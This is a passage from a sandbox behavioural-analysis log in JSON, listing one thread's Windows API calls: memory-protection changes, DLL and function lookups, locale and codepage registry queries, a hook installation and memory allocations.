}, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 213 }, { "timestamp": "2025-02-27 23:34:13,909", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 214 }, { "timestamp": "2025-02-27 23:34:13,909", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 215 }, { "timestamp": "2025-02-27 23:34:13,909", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 216 }, { "timestamp": "2025-02-27 23:34:13,909", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 217 }, { "timestamp": "2025-02-27 23:34:13,909", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "USER32" }, { "name": "ModuleHandle", "value": "0x76610000" } ], "repeated": 0, "id": 218 }, { "timestamp": "2025-02-27 23:34:13,909", "thread_id": "3892", "caller": "0x764f960d", "parentcaller": "0x7587f804", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetSystemMetrics" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76645390" } ], "repeated": 0, "id": 219 }, { "timestamp": "2025-02-27 23:34:13,909", "thread_id": "3892", "caller": "0x764f960d", "parentcaller": "0x7587f804", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "MonitorFromWindow" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76649de0" } ], "repeated": 0, "id": 220 }, { "timestamp": "2025-02-27 23:34:13,909", "thread_id": "3892", "caller": "0x764f960d", "parentcaller": "0x7587f804", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "MonitorFromRect" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76639890" } ], "repeated": 0, "id": 221 }, { "timestamp": "2025-02-27 23:34:13,909", "thread_id": "3892", "caller": "0x764f960d", "parentcaller": "0x7587f804", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "MonitorFromPoint" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76641320" } ], "repeated": 0, "id": 222 }, { "timestamp": "2025-02-27 23:34:13,909", "thread_id": "3892", "caller": "0x764f960d", "parentcaller": "0x7587f804", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "EnumDisplayMonitors" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766520a0" } ], "repeated": 0, "id": 223 }, { "timestamp": "2025-02-27 23:34:13,909", "thread_id": "3892", "caller": "0x764f960d", "parentcaller": "0x7587f804", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetMonitorInfoA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76634cc0" } ], "repeated": 0, "id": 224 }, { "timestamp": "2025-02-27 23:34:13,909", "thread_id": "3892", "caller": "0x7320bedc", "parentcaller": "0x00000000", "category": "misc", "api": "GetSystemMetrics", "status": true, "return": "0x00000400", "arguments": [ { "name": "SystemMetricIndex", "value": "0" } ], "repeated": 0, "id": 225 }, { "timestamp": "2025-02-27 23:34:13,909", "thread_id": "3892", "caller": "0x7320bee2", "parentcaller": "0x00000000", "category": "misc", "api": "GetSystemMetrics", "status": true, "return": "0x00000400", "arguments": [ { "name": "SystemMetricIndex", "value": "78" } ], "repeated": 0, "id": 226 }, { "timestamp": "2025-02-27 23:34:13,909", "thread_id": "3892", "caller": "0x7320beed", "parentcaller": "0x00000000", "category": "misc", "api": "GetSystemMetrics", "status": true, "return": "0x00000300", "arguments": [ { "name": "SystemMetricIndex", "value": "1" } ], "repeated": 0, "id": 227 }, { "timestamp": "2025-02-27 23:34:13,909", "thread_id": "3892", "caller": "0x7320bef3", "parentcaller": "0x00000000", "category": "misc", "api": "GetSystemMetrics", "status": true, "return": "0x00000300", "arguments": [ { "name": "SystemMetricIndex", "value": "79" } ], "repeated": 0, "id": 228 }, { "timestamp": "2025-02-27 23:34:13,925", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000254" }, { "name": "DesiredAccess", "value": "0x0000000d" }, { "name": "ObjectAttributes", "value": "MSCTF.dll" } ], "repeated": 0, "id": 229 }, { "timestamp": "2025-02-27 23:34:13,925", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000254" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75650000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x000d4000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 230 }, { "timestamp": "2025-02-27 23:34:13,925", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75718000" }, { "name": "ModuleName", "value": "MSCTF.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 231 }, { "timestamp": "2025-02-27 23:34:13,925", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 232 }, { "timestamp": "2025-02-27 23:34:13,925", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 233 }, { "timestamp": "2025-02-27 23:34:13,925", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75714000" }, { "name": "ModuleName", "value": "MSCTF.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 234 }, { "timestamp": "2025-02-27 23:34:13,925", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" } ], "repeated": 0, "id": 235 }, { "timestamp": "2025-02-27 23:34:13,925", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75714000" }, { "name": "ModuleName", "value": "MSCTF.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 236 }, { "timestamp": "2025-02-27 23:34:13,925", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "35" }, { "name": "ProcessInformation", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00o\\x00r\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00n\\x003\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00u\\x00l\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00r\\x00-\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00-\\x000\\x00" } ], "repeated": 0, "id": 237 }, { "timestamp": "2025-02-27 23:34:13,925", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "DDRAW.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 1, "id": 238 }, { "timestamp": "2025-02-27 23:34:13,925", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "D3D8.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 0, "id": 239 }, { "timestamp": "2025-02-27 23:34:13,925", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "D3D9.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 1, "id": 240 }, { "timestamp": "2025-02-27 23:34:13,925", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "misc", "api": "RtlDosPathNameToNtPathName_U", "status": true, "return": "0x00000001", "arguments": [ { "name": "DosFileName", "value": "C:\\Windows\\System32\\MSCTF.dll" } ], "repeated": 0, "id": 241 }, { "timestamp": "2025-02-27 23:34:13,925", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000254" }, { "name": "DesiredAccess", "value": "0x00020000", "pretty_value": "READ_CONTROL" }, { "name": "FileName", "value": "C:\\Windows\\System32\\msctf.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 242 }, { "timestamp": "2025-02-27 23:34:13,925", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" } ], "repeated": 0, "id": 243 }, { "timestamp": "2025-02-27 23:34:13,925", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\MSCTF" }, { "name": "DllBase", "value": "0x75650000" } ], "repeated": 0, "id": 244 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\msctf" }, { "name": "BaseAddress", "value": "0x75650000" }, { "name": "InitRoutine", "value": "0x7569e400" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 245 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7574d000" }, { "name": "ModuleName", "value": "IMM32.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 246 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7574d000" }, { "name": "ModuleName", "value": "IMM32.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 247 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000250" } ], "repeated": 0, "id": 248 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000025c" } ], "repeated": 0, "id": 249 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7574d000" }, { "name": "ModuleName", "value": "IMM32.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 250 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7574d000" }, { "name": "ModuleName", "value": "IMM32.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 251 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 252 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 253 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 0, "id": 254 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000025c" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Nls\\Codepage" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\Codepage" } ], "repeated": 0, "id": 255 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000025c" }, { "name": "ValueName", "value": "932" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "c_932.nls" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CodePage\\932" } ], "repeated": 0, "id": 256 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\sysnative\\C_932.NLS" } ], "repeated": 0, "id": 257 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000025c" }, { "name": "ValueName", "value": "949" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "c_949.nls" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CodePage\\949" } ], "repeated": 0, "id": 258 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\sysnative\\C_949.NLS" } ], "repeated": 0, "id": 259 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000025c" }, { "name": "ValueName", "value": "950" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "c_950.nls" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CodePage\\950" } ], "repeated": 0, "id": 260 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\sysnative\\C_950.NLS" } ], "repeated": 0, "id": 261 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000025c" }, { "name": "ValueName", "value": "936" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "c_936.nls" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CodePage\\936" } ], "repeated": 0, "id": 262 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\sysnative\\C_936.NLS" } ], "repeated": 0, "id": 263 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 0, "id": 264 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemDefaultLangID", "status": true, "return": "0x00710c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00710c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 0, "id": 265 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 266 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x02000000", "pretty_value": "MAXIMUM_ALLOWED" }, { "name": "ObjectAttributesHandle", "value": "0x00000124" }, { "name": "ObjectAttributesName", "value": "SOFTWARE\\Microsoft\\VBA\\Monitors" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\VBA\\Monitors" } ], "repeated": 0, "id": 267 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "SetWindowsHookExA", "status": true, "return": "0x003101ef", "arguments": [ { "name": "HookIdentifier", "value": "18446744073709551615" }, { "name": "ProcedureAddress", "value": "0x732400ca" }, { "name": "ModuleAddress", "value": "0x00000000" }, { "name": "ThreadId", "value": "3892" } ], "repeated": 0, "id": 268 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "user32" }, { "name": "BaseAddress", "value": "0x76610000" } ], "repeated": 0, "id": 269 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x04a92000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 270 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x04a93000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 271 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x04a94000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 272 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", 